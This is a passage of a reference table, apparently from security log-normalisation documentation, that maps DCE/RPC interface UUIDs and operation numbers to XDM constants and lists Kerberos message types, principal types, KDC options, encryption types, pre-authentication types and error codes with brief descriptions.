6b5bdd1e-528c-422c-af8c-a4079be4fe48:40 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_AUTHENTICATION_SETS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:41 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_CRYPTO_SETS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:42 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_NETWORKS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:43 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_ADAPTERS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:44 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_GLOBAL_CONFIG210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:45 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_CONFIG210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:46 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:47 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:48 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:49 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CONNECTION_SECURITY_RULE210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:50 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONNECTION_SECURITY_RULE210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:51 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:52 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_AUTHENTICATION_SET210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:53 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_AUTHENTICATION_SET210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:54 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_AUTHENTICATION_SETS210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:55 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CRYPTO_SET210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:56 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CRYPTO_SET210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:57 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CRYPTO_SETS210

6b5bdd1e-528c-422c-af8c-a4079be4fe48:58 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CONNECTION_SECURITY_RULE220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:59 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONNECTION_SECURITY_RULE220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:60 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:61 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_CONNECTION_SECURITY_RULES220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:62 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_AUTHENTICATION_SET220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:63 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_AUTHENTICATION_SETS220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:64 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_AUTHENTICATION_SETS220
 Original Mapped Description

6b5bdd1e-528c-422c-af8c-a4079be4fe48:65 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:66 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:67 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:69 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES220

6b5bdd1e-528c-422c-af8c-a4079be4fe48:70 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE224

6b5bdd1e-528c-422c-af8c-a4079be4fe48:71 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE224

6b5bdd1e-528c-422c-af8c-a4079be4fe48:72 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES224

6b5bdd1e-528c-422c-af8c-a4079be4fe48:73 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES224

6b5bdd1e-528c-422c-af8c-a4079be4fe48:74 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE225

6b5bdd1e-528c-422c-af8c-a4079be4fe48:75 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE225

6b5bdd1e-528c-422c-af8c-a4079be4fe48:76 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES225

6b5bdd1e-528c-422c-af8c-a4079be4fe48:77 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES225

6b5bdd1e-528c-422c-af8c-a4079be4fe48:78 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE226

6b5bdd1e-528c-422c-af8c-a4079be4fe48:79 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE226

6b5bdd1e-528c-422c-af8c-a4079be4fe48:80 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES226

6b5bdd1e-528c-422c-af8c-a4079be4fe48:81 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES226

2f5f6521-ca47-1068-b319-00dd010662db:0 XDM_CONST.DCERPC_OPERATION_REMOTE_SP_ATTACH

2f5f6521-ca47-1068-b319-00dd010662db:1 XDM_CONST.DCERPC_OPERATION_REMOTE_SP_EVENT_PROC

2f5f6521-ca47-1068-b319-00dd010662db:2 XDM_CONST.DCERPC_OPERATION_REMOTE_SP_DETACH

1257b580-ce2f-4109-82d6-a9459d0bf6bc:0 XDM_CONST.DCERPC_OPERATION_RPC_SHADOW2

4b112204-0e19-11d3-b42b-0000f81feb9f:0 XDM_CONST.DCERPC_OPERATION_REGISTER_SERVICE_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:1 XDM_CONST.DCERPC_OPERATION_DEREGISTER_SERVICE_RPC_BY_USN

4b112204-0e19-11d3-b42b-0000f81feb9f:2 XDM_CONST.DCERPC_OPERATION_DEREGISTER_SERVICE_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:3 XDM_CONST.DCERPC_OPERATION_UPDATE_CACHE_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:4 XDM_CONST.DCERPC_OPERATION_LOOKUP_CACHE_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:5 XDM_CONST.DCERPC_OPERATION_CLEANUP_CACHE_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:6 XDM_CONST.DCERPC_OPERATION_INITIALIZE_SYNC_HANDLE

4b112204-0e19-11d3-b42b-0000f81feb9f:7 XDM_CONST.DCERPC_OPERATION_REMOVE_SYNC_HANDLE

4b112204-0e19-11d3-b42b-0000f81feb9f:8 XDM_CONST.DCERPC_OPERATION_REGISTER_NOTIFICATION_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:9 XDM_CONST.DCERPC_OPERATION_GET_NOTIFICATION_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:10 XDM_CONST.DCERPC_OPERATION_WAKEUP_GET_NOTIFICATION_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:11 XDM_CONST.DCERPC_OPERATION_DEREGISTER_NOTIFICATION_RPC

4b112204-0e19-11d3-b42b-0000f81feb9f:12 XDM_CONST.DCERPC_OPERATION_ENABLE_DEVICE_HOST

4b112204-0e19-11d3-b42b-0000f81feb9f:13 XDM_CONST.DCERPC_OPERATION_DISABLE_DEVICE_HOST

4b112204-0e19-11d3-b42b-0000f81feb9f:14 XDM_CONST.DCERPC_OPERATION_SET_ICS_INTERFACES

4b112204-0e19-11d3-b42b-0000f81feb9f:15 XDM_CONST.DCERPC_OPERATION_SET_ICS_OFF

2f5f6520-ca46-1067-b319-00dd010662da:0 XDM_CONST.DCERPC_OPERATION_CLIENT_ATTACH

2f5f6520-ca46-1067-b319-00dd010662da:1 XDM_CONST.DCERPC_OPERATION_CLIENT_REQUEST

2f5f6520-ca46-1067-b319-00dd010662da:2 XDM_CONST.DCERPC_OPERATION_CLIENT_DETACH

88143fd0-c28d-4b2b-8fef-8d882f6a9390:0 XDM_CONST.DCERPC_OPERATION_RPC_OPEN_ENUM

88143fd0-c28d-4b2b-8fef-8d882f6a9390:1 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_ENUM
 Original Mapped Description

88143fd0-c28d-4b2b-8fef-8d882f6a9390:2 XDM_CONST.DCERPC_OPERATION_RPC_FILTER_BY_STATE

88143fd0-c28d-4b2b-8fef-8d882f6a9390:3 XDM_CONST.DCERPC_OPERATION_RPC_FILTER_BY_CALLERS_NAME

88143fd0-c28d-4b2b-8fef-8d882f6a9390:4 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_ADD_FILTER

88143fd0-c28d-4b2b-8fef-8d882f6a9390:5 XDM_CONST.DCERPC_OPERATION_RPC_GET_ENUM_RESULT

88143fd0-c28d-4b2b-8fef-8d882f6a9390:6 XDM_CONST.DCERPC_OPERATION_RPC_FILTER_BY_SESSION_TYPE

88143fd0-c28d-4b2b-8fef-8d882f6a9390:8 XDM_CONST.DCERPC_OPERATION_RPC_GET_SESSION_IDS

88143fd0-c28d-4b2b-8fef-8d882f6a9390:9 XDM_CONST.DCERPC_OPERATION_RPC_GET_ENUM_RESULT_EX

88143fd0-c28d-4b2b-8fef-8d882f6a9390:10 XDM_CONST.DCERPC_OPERATION_RPC_GET_ALL_SESSIONS

88143fd0-c28d-4b2b-8fef-8d882f6a9390:11 XDM_CONST.DCERPC_OPERATION_RPC_GET_ALL_SESSIONS_EX

11899a43-2b68-4a76-92e3-a3d6ad8c26ce:0 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_FOR_SESSION_STATE

11899a43-2b68-4a76-92e3-a3d6ad8c26ce:1 XDM_CONST.DCERPC_OPERATION_RPC_REGISTER_ASYNC_NOTIFICATION

11899a43-2b68-4a76-92e3-a3d6ad8c26ce:2 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_ASYNC_NOTIFICATION

11899a43-2b68-4a76-92e3-a3d6ad8c26ce:3 XDM_CONST.DCERPC_OPERATION_RPC_UN_REGISTER_ASYNC_NOTIFICATION

484809d6-4239-471b-b5bc-61df8c23ac48:0 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_FOR_SESSION_STATE

484809d6-4239-471b-b5bc-61df8c23ac48:1 XDM_CONST.DCERPC_OPERATION_RPC_REGISTER_ASYNC_NOTIFICATION

484809d6-4239-471b-b5bc-61df8c23ac48:2 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_ASYNC_NOTIFICATION

484809d6-4239-471b-b5bc-61df8c23ac48:3 XDM_CONST.DCERPC_OPERATION_RPC_UN_REGISTER_ASYNC_NOTIFICATION

4da1c422-943d-11d1-acae-00c04fc2aa3f:0 XDM_CONST.DCERPC_OPERATION_LNK_SVR_MESSAGE

4da1c422-943d-11d1-acae-00c04fc2aa3f:1 XDM_CONST.DCERPC_OPERATION_LNK_SVR_MESSAGE_CALLBACK

300f3532-38cc-11d0-a3f0-0020af6b0add:12 XDM_CONST.DCERPC_OPERATION_LNK_SEARCH_MACHINE

44e265dd-7daf-42cd-8560-3cdb6e7a2729:1 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CREATE_TUNNEL

44e265dd-7daf-42cd-8560-3cdb6e7a2729:2 XDM_CONST.DCERPC_OPERATION_TS_PROXY_AUTHORIZE_TUNNEL

44e265dd-7daf-42cd-8560-3cdb6e7a2729:3 XDM_CONST.DCERPC_OPERATION_TS_PROXY_MAKE_TUNNEL_CALL

44e265dd-7daf-42cd-8560-3cdb6e7a2729:4 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CREATE_CHANNEL

44e265dd-7daf-42cd-8560-3cdb6e7a2729:6 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CLOSE_CHANNEL

44e265dd-7daf-42cd-8560-3cdb6e7a2729:7 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CLOSE_TUNNEL

44e265dd-7daf-42cd-8560-3cdb6e7a2729:8 XDM_CONST.DCERPC_OPERATION_TS_PROXY_SETUP_RECEIVE_PIPE

44e265dd-7daf-42cd-8560-3cdb6e7a2729:9 XDM_CONST.DCERPC_OPERATION_TS_PROXY_SEND_TO_SERVER

53b46b02-c73b-4a3e-8dee-b16b80672fc0:0 XDM_CONST.DCERPC_OPERATION_RPC_GET_SESSION_IP

8fb6d884-2388-11d0-8c35-00c04fda2795:0 XDM_CONST.DCERPC_OPERATION_W32_TIME_SYNC

8fb6d884-2388-11d0-8c35-00c04fda2795:1 XDM_CONST.DCERPC_OPERATION_W32_TIME_GET_NETLOGON_SERVICE_BITS

8fb6d884-2388-11d0-8c35-00c04fda2795:2 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_PROVIDER_STATUS

8fb6d884-2388-11d0-8c35-00c04fda2795:3 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_SOURCE

8fb6d884-2388-11d0-8c35-00c04fda2795:4 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_PROVIDER_CONFIGURATION

8fb6d884-2388-11d0-8c35-00c04fda2795:5 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_CONFIGURATION

8fb6d884-2388-11d0-8c35-00c04fda2795:6 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_STATUS

8fb6d884-2388-11d0-8c35-00c04fda2795:7 XDM_CONST.DCERPC_OPERATION_W32_TIME_LOG

1a927394-352e-4553-ae3f-7cf4aafca620:0 XDM_CONST.DCERPC_OPERATION_WDS_RPC_MESSAGE

811109bf-a4e1-11d1-ab54-00a0c91e9b45:0 XDM_CONST.DCERPC_OPERATION_R_WINS_TOMBSTONE_DB_RECS

811109bf-a4e1-11d1-ab54-00a0c91e9b45:1 XDM_CONST.DCERPC_OPERATION_R_WINS_CHECK_ACCESS

ccd8c074-d0e5-4a40-92b4-d074faa6ba28:0 XDM_CONST.DCERPC_OPERATION_WITNESSR_GET_INTERFACE_LIST
 Original Mapped Description

ccd8c074-d0e5-4a40-92b4-d074faa6ba28:1 XDM_CONST.DCERPC_OPERATION_WITNESSR_REGISTER

ccd8c074-d0e5-4a40-92b4-d074faa6ba28:2 XDM_CONST.DCERPC_OPERATION_WITNESSR_UN_REGISTER

ccd8c074-d0e5-4a40-92b4-d074faa6ba28:3 XDM_CONST.DCERPC_OPERATION_WITNESSR_ASYNC_NOTIFY

ccd8c074-d0e5-4a40-92b4-d074faa6ba28:4 XDM_CONST.DCERPC_OPERATION_WITNESSR_REGISTER_EX

3.15 | XDM_CONST.KERBEROS_MSG_TYPE
Kerberos 5 message type assigned numbers.

Original Mapped Description

10 XDM_CONST.KERBEROS_MSG_TYPE_AS_REQ Request for initial authentication.

11 XDM_CONST.KERBEROS_MSG_TYPE_AS_REP Response to KRB_AS_REQ request.

12 XDM_CONST.KERBEROS_MSG_TYPE_TGS_REQ Request for authentication based on TGT.

13 XDM_CONST.KERBEROS_MSG_TYPE_TGS_REP Response to KRB_TGS_REQ request.

14 XDM_CONST.KERBEROS_MSG_TYPE_AP_REQ request to server.

15 XDM_CONST.KERBEROS_MSG_TYPE_AP_REP Response to KRB_AP_REQ_MUTUAL.

16 XDM_CONST.KERBEROS_MSG_TYPE_RESERVED16 Reserved for user-to-user krb_tgt_request.

17 XDM_CONST.KERBEROS_MSG_TYPE_RESERVED17 Reserved for user-to-user krb_tgt_reply.

20 XDM_CONST.KERBEROS_MSG_TYPE_SAFE Safe (checksummed) application message.

21 XDM_CONST.KERBEROS_MSG_TYPE_PRIV Private (encrypted) application message.

22 XDM_CONST.KERBEROS_MSG_TYPE_CRED Private (encrypted) message to forward credentials.

30 XDM_CONST.KERBEROS_MSG_TYPE_ERROR Error response

3.16 | XDM_CONST.KERBEROS_PRINCIPAL_TYPE
The type of the principal.

Original Mapped Description

0 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UNKNOWN Name type not known.

1 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_PRINCIPAL The name of the principal, as in DCE, or for users.

2 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_INST Service and other unique instance (krbtgt).

3 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_HST Service with host name as instance (telnet, rcommands).

4 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_XHST Service with host as remaining components.

5 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UID Unique ID

6 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_X500_PRINCIPAL Encoded X.509 Distinguished name [RFC2253].

7 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SMTP_NAME Name in form of SMTP email name (e.g., [email protected]).

10 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_ENTERPRISE Enterprise name; may be mapped to principal name.

3.17 | XDM_CONST.KERBEROS_KDC_OPTION
Flags requested in the ticket.

Original Mapped Description

0 XDM_CONST.KERBEROS_KDC_OPTION_RESERVED

1 XDM_CONST.KERBEROS_KDC_OPTION_FORWARDABLE

2 XDM_CONST.KERBEROS_KDC_OPTION_FORWARDED

3 XDM_CONST.KERBEROS_KDC_OPTION_PROXIABLE

4 XDM_CONST.KERBEROS_KDC_OPTION_PROXY

5 XDM_CONST.KERBEROS_KDC_OPTION_ALLOW_POST_DATE

6 XDM_CONST.KERBEROS_KDC_OPTION_POST_DATED
 Original Mapped Description

7 XDM_CONST.KERBEROS_KDC_OPTION_INVALID

8 XDM_CONST.KERBEROS_KDC_OPTION_RENEWABLE

9 XDM_CONST.KERBEROS_KDC_OPTION_INITIAL

10 XDM_CONST.KERBEROS_KDC_OPTION_PRE_AUTHENT

11 XDM_CONST.KERBEROS_KDC_OPTION_HW_AUTHENT

12 XDM_CONST.KERBEROS_KDC_OPTION_REQUEST_ANONYMOUS

13 XDM_CONST.KERBEROS_KDC_OPTION_OK_AS_DELEGATE

15 XDM_CONST.KERBEROS_KDC_OPTION_CANONICALIZE

26 XDM_CONST.KERBEROS_KDC_OPTION_DISABLE_TRANSITED_CHECK

27 XDM_CONST.KERBEROS_KDC_OPTION_RENEWABLE_OK

28 XDM_CONST.KERBEROS_KDC_OPTION_ENC_TKT_IN_SKEY

30 XDM_CONST.KERBEROS_KDC_OPTION_RENEW

31 XDM_CONST.KERBEROS_KDC_OPTION_VALIDATE

3.18 | XDM_CONST.KERBEROS_ENCRYPTION_TYPE
Encryption type assigned numbers.

Original Mapped Description

1 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_CRC CRC-32 checksum of the data, as computed using the DES block cipher

2 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD4 MD4 checksum of the data, as computed using the DES block cipher

3 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD5 MD5 checksum of the data, as computed using the DES block cipher

4 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_RAW Raw DES block cipher

5 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_MD5 MD5 checksum of the data, as computed using triple DES block cipher

6 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_RAW Raw triple DES block cipher

7 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_SHA1 SHA-1 checksum of the data, as computed using triple DES block cipher

8 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_HMAC_SHA1 HMAC-SHA-1 checksum of the data, as computed using the DES block cipher

9 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DSAWITHSHA1_CMSOID DSA with SHA-1 signature algorithm

10 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_MD5WITHRSAENCRYPTION_CMSOID RSA encryption with MD5 digest algorithm

11 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_SHA1WITHRSAENCRYPTION_CMSOID RSA encryption with SHA-1 digest algorithm

12 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_RC2CBC_ENVOID RC2 block cipher in CBC mode

13 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_RSAENCRYPTION_ENVOID RSA encryption

14 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_RSAES_OAEP_ENV_OID RSAES-OAEP encryption algorithm

15 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_EDE3_CBC_ENV_OID Triple DES block cipher in EDE-CBC mode

16 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_SHA1_KD Triple DES block cipher in EDE-CBC mode with SHA-1 checksum

17 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_AES128_CTS_HMAC_SHA1_96 AES-128 block cipher in CTS mode with HMAC-SHA-1-96 checksum

18 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_AES256_CTS_HMAC_SHA1_96 AES-256 block cipher in CTS mode with HMAC-SHA-1-96 checksum

19 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_AES128_CTS_HMAC_SHA256_128 AES-128 block cipher in CTS mode with HMAC-SHA-256-128 checksum

20 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_AES256_CTS_HMAC_SHA384_192 AES-256 block cipher in CTS mode with HMAC-SHA-384-192 checksum

23 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_RC4_HMAC RC4 block cipher with HMAC checksum

24 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_RC4_HMAC_EXP Exported RC4 block cipher with HMAC checksum

25 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_CAMELLIA128_CTS_CMAC Camellia-128 block cipher in CTS mode with CMAC checksum

26 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_CAMELLIA256_CTS_CMAC Camellia-256 block cipher in CTS mode with CMAC checksum

65 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_SUBKEY_KEYMATERIAL Encryption key material for subkey

3.19 | XDM_CONST.KERBEROS_PA_TYPE
Pre-authentication data types.

Original Mapped Description

1 XDM_CONST.KERBEROS_PA_TYPE_TGS_REQ

2 XDM_CONST.KERBEROS_PA_TYPE_ENC_TIMESTAMP

3 XDM_CONST.KERBEROS_PA_TYPE_PW_SALT

5 XDM_CONST.KERBEROS_PA_TYPE_ENC_UNIX_TIME

6 XDM_CONST.KERBEROS_PA_TYPE_SANDIA_SECUREID

7 XDM_CONST.KERBEROS_PA_TYPE_SESAME

8 XDM_CONST.KERBEROS_PA_TYPE_OSF_DCE

9 XDM_CONST.KERBEROS_PA_TYPE_CYBERSAFE_SECUREID

10 XDM_CONST.KERBEROS_PA_TYPE_AFS3_SALT

11 XDM_CONST.KERBEROS_PA_TYPE_ETYPE_INFO

12 XDM_CONST.KERBEROS_PA_TYPE_SAM_CHALLENGE

13 XDM_CONST.KERBEROS_PA_TYPE_SAM_RESPONSE

14 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REQ_OLD

15 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REP_OLD

16 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REQ

17 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REP

18 XDM_CONST.KERBEROS_PA_TYPE_PK_OCSP_RESPONSE

19 XDM_CONST.KERBEROS_PA_TYPE_ETYPE_INFO2

20 XDM_CONST.KERBEROS_PA_TYPE_USE_SPECIFIED_KVNO

21 XDM_CONST.KERBEROS_PA_TYPE_SAM_REDIRECT

22 XDM_CONST.KERBEROS_PA_TYPE_GET_FROM_TYPED_DATA

23 XDM_CONST.KERBEROS_PA_TYPE_SAM_ETYPE_INFO

24 XDM_CONST.KERBEROS_PA_TYPE_ALT_PRINC

25 XDM_CONST.KERBEROS_PA_TYPE_SERVER_REFERRAL

30 XDM_CONST.KERBEROS_PA_TYPE_SAM_CHALLENGE2

31 XDM_CONST.KERBEROS_PA_TYPE_SAM_RESPONSE2

41 XDM_CONST.KERBEROS_PA_TYPE_EXTRA_TGT

101 XDM_CONST.KERBEROS_PA_TYPE_TD_PKINIT_CMS_CERTIFICATES

102 XDM_CONST.KERBEROS_PA_TYPE_TD_KRB_PRINCIPAL

103 XDM_CONST.KERBEROS_PA_TYPE_TD_KRB_REALM

104 XDM_CONST.KERBEROS_PA_TYPE_TD_TRUSTED_CERTIFIERS

105 XDM_CONST.KERBEROS_PA_TYPE_TD_CERTIFICATE_INDEX

106 XDM_CONST.KERBEROS_PA_TYPE_TD_APP_DEFINED_ERROR

107 XDM_CONST.KERBEROS_PA_TYPE_TD_REQ_NONCE

108 XDM_CONST.KERBEROS_PA_TYPE_TD_REQ_SEQ

109 XDM_CONST.KERBEROS_PA_TYPE_TD_DH_PARAMETERS

111 XDM_CONST.KERBEROS_PA_TYPE_TD_CMS_DIGEST_ALGORITHMS

112 XDM_CONST.KERBEROS_PA_TYPE_TD_CERT_DIGEST_ALGORITHMS

128 XDM_CONST.KERBEROS_PA_TYPE_PAC_REQUEST

129 XDM_CONST.KERBEROS_PA_TYPE_FOR_USER
 Original Mapped Description

130 XDM_CONST.KERBEROS_PA_TYPE_FOR_X509_USER

131 XDM_CONST.KERBEROS_PA_TYPE_FOR_CHECK_DUPS

132 XDM_CONST.KERBEROS_PA_TYPE_AS_CHECKSUM

133 XDM_CONST.KERBEROS_PA_TYPE_FX_COOKIE

134 XDM_CONST.KERBEROS_PA_TYPE_AUTHENTICATION_SET

135 XDM_CONST.KERBEROS_PA_TYPE_AUTH_SET_SELECTED

136 XDM_CONST.KERBEROS_PA_TYPE_FX_FAST

137 XDM_CONST.KERBEROS_PA_TYPE_FX_ERROR

138 XDM_CONST.KERBEROS_PA_TYPE_ENCRYPTED_CHALLENGE

141 XDM_CONST.KERBEROS_PA_TYPE_OTP_CHALLENGE

142 XDM_CONST.KERBEROS_PA_TYPE_OTP_REQUEST

143 XDM_CONST.KERBEROS_PA_TYPE_OTP_CONFIRM

144 XDM_CONST.KERBEROS_PA_TYPE_OTP_PIN_CHANGE

145 XDM_CONST.KERBEROS_PA_TYPE_EPAK_AS_REQ

146 XDM_CONST.KERBEROS_PA_TYPE_EPAK_AS_REP

147 XDM_CONST.KERBEROS_PA_TYPE_PKINIT_KX

148 XDM_CONST.KERBEROS_PA_TYPE_PKU2U_NAME

149 XDM_CONST.KERBEROS_PA_TYPE_REQ_ENC_PA_REP

150 XDM_CONST.KERBEROS_PA_TYPE_AS_FRESHNESS

165 XDM_CONST.KERBEROS_PA_TYPE_SUPPORTED_ETYPES

166 XDM_CONST.KERBEROS_PA_TYPE_EXTENDED_ERROR

3.20 | XDM_CONST.KERBEROS_ERROR_CODE
Kerberos error code.

Original Mapped Description

0 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NONE No error

1 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NAME_EXP Client's entry in database has expired.

2 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SERVICE_EXP Server's entry in database has expired.

3 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_BAD_PVNO Requested protocol version number not supported.

4 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_C_OLD_MAST_KVNO Client's key encrypted in old master key.

5 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_S_OLD_MAST_KVNO Server's key encrypted in old master key.

6 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_C_PRINCIPAL_UNKNOWN Client not found in Kerberos database.

7 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_S_PRINCIPAL_UNKNOWN Server not found in Kerberos database.

8 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_PRINCIPAL_NOT_UNIQUE Multiple principal entries in database.

9 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NULL_KEY The client or server has a null key.

10 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_CANNOT_POSTDATE Ticket not eligible for postdating.

11 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NEVER_VALID Requested start time is later than end time.

12 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_POLICY KDC policy rejects request.

13 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_BADOPTION KDC cannot accommodate requested option.

14 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_ETYPE_NOSUPP KDC has no support for encryption type.

15 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SUMTYPE_NOSUPP KDC has no support for checksum type.

16 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_PADATA_TYPE_NOSUPP KDC has no support for padata type.

Original Mapped Description

17 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_TRTYPE_NOSUPP KDC has no support for transited type.

18 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_CLIENT_REVOKED Clients credentials have been revoked.

